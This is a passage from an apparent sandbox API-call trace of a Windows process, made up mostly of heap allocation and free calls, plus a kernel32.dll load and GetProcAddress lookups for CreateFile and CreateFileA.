out: hHeap=0x8a0000) returned 1 [0186.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0186.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0186.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0186.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0186.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c08b0 | out: hHeap=0x8a0000) returned 1 [0186.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0186.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0186.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0186.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0186.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0186.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0186.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0186.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0186.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0186.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0186.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0186.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0186.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0186.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0186.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0186.500] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0186.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0186.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0186.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1900 [0186.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0186.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0186.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0186.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0186.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0186.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0186.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0186.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd648 [0186.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0186.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0186.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0186.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0186.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0186.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0186.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0186.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0186.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0186.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0186.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0186.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0186.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0186.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0186.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0186.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0186.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0186.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0186.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0186.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0186.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0186.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0186.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0186.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0186.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0186.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0186.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0186.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0186.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0186.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0186.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0186.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0186.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0186.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0186.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0186.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0186.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0186.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0186.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0186.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0186.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0186.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0186.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0186.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0186.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0186.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0186.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0186.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.505] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0186.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0186.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0186.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0186.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0186.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0186.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0186.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0186.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0186.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0186.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0186.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0186.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0186.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0186.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0186.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0186.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0186.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0186.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0186.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0186.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0186.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0186.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0186.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0186.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0186.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0186.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0186.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0186.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0186.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0186.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0186.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0186.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0186.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0186.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0186.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0186.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0186.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0186.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0186.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0186.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0186.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0186.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0186.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0186.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.508] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0186.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0186.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0186.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9fa0 [0186.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9fa0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0186.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.509] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0186.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0186.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0186.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0186.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0186.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0186.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0186.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fa0 [0186.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9fa0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0186.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.510] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0186.510] 